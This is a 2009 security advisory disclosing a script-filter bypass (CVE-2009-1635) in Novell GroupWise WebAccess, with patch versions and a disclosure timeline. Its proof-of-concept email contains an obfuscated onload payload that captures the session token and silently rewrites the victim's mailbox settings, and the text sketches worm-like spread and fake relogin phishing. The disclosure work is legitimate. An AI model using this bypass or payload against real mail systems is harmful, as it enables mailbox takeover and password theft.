<<< Date Index >>>     <<< Thread Index >>>

Novell Groupwise fails to properly sanitize emails.

Affected product
----------------

Novell Groupwise webaccess 
Affected software: 7.x and 8.0


Vulnerability details
---------------------

Groupwise WebAccess implements a security parser designed to prevent embedded 
scripts in HTML emails from executing in the users's browser.
Unfortunately this parser fails to recognize some unusual but valid syntaxes 
like the one used in the example shown below allowing a maliciously crafted 
email to run its payload in the context of a user session. 
All the configuration options of a user's mailbox, including proxy and rule 
lists, are therefore exposed to illegitimate modification and will easily grant 
an attacker read/write access to the victim's mailbox.
A malicious code might be well designed like a worm and spread itself using its 
victims's address book taking over all of a company's mailboxes one after 
another. 
Even though the accounts's password can't be extracted or changed through 
direct call to the configuration tools, 
other indirect attacks are still available like using a fake relogin page 
prompting victims to give up their password.

Following harmless code uses an onload() event handler to bootstrap its payload 
as soon as the email is open.
The first stage of this script extracts the session token (User.Context) from 
within the current document's URI and used 
to make up the second stage.
The second injects an iframe in the current page which in turn calls the 
signature configuration interface and changes the user's signature on the fly.
This example uses a fake target, 'gwwa.victim.com' that must be changed with a 
real server addresss/name.
Here, the security parser won't recognize "onload = 'javascript:..." as 
potentially unsafe just because of the space characters.
 
<!--
    <html>
    <head>
    </head>
        <body onmouseover = 'return false;' onload = 'javascript:var 
context=document.location.href;var 
token=context.replace(/^.+context=([a-z0-9]+).+$/i,"$1");
        var 
malwareS1="%3C%68%74%6D%6C%3E%3C%62%6F%64%79%3E%3C%62%72%2F%3E%3C%62%72%2F%3E%4E%6F%77%20%63%68%65%63%6B%20%79%6F%75%72%20%73%69%67%6E%61%74%75%72%65%20%2E%2E%2E%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%67%77%77%61%2E%76%69%63%74%69%6D%2E%63%6F%6D%2F%67%77%2F%77%65%62%61%63%63%3F%55%73%65%72%2E%63%6F%6E%74%65%78%74%3D";
        var 
malwareS2="%26%61%63%74%69%6F%6E%3D%53%69%67%6E%61%74%75%72%65%2E%4D%6F%64%69%66%79%26%6D%65%72%67%65%3D%73%69%67%6E%61%74%75%72%26%53%69%67%6E%61%74%75%72%65%2E%69%73%45%6E%61%62%6C%65%64%3D%65%6E%61%62%6C%65%64%26%53%69%67%6E%61%74%75%72%65%2E%69%73%41%75%74%6F%6D%61%74%69%63%3D%61%75%74%6F%6D%61%74%69%63%26%53%69%67%6E%61%74%75%72%65%2E%73%69%67%6E%61%74%75%72%65%3D%25%32%30%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%2D%2B%25%30%64%25%30%61%25%30%64%25%30%61%30%77%6E%65%64%2E%22%20%77%69%64%74%68%3D%30%70%78%20%68%65%69%67%68%74%3D%30%70%78%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%62%6F%64%79%3E%3C%2F%68%74%6D%6C%3E";
        document.write(unescape(malwareS1)+token+unescape(malwareS2));return 
false;'>
            <br/>
            <br/><br/>Now check your signature ...
        </body>
    </html>
-->


Resolution
----------

For GroupWise 7.x systems, apply GroupWise 7.03 Hot Patch 3 (HP3) or later
For GroupWise 8.0 systems, apply GroupWise 8.0 Hot Patch 2 (HP2) or later


Disclosure timeline
-------------------

2009-01-29: Vulnerability reported to Novell.
2009-05-21: Patch released by Novell.
2009-05-28: Public disclosure.


References
----------

http://www.novell.com/support/viewContent.do?externalId=7003268
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1635

---
Gregory Duchemin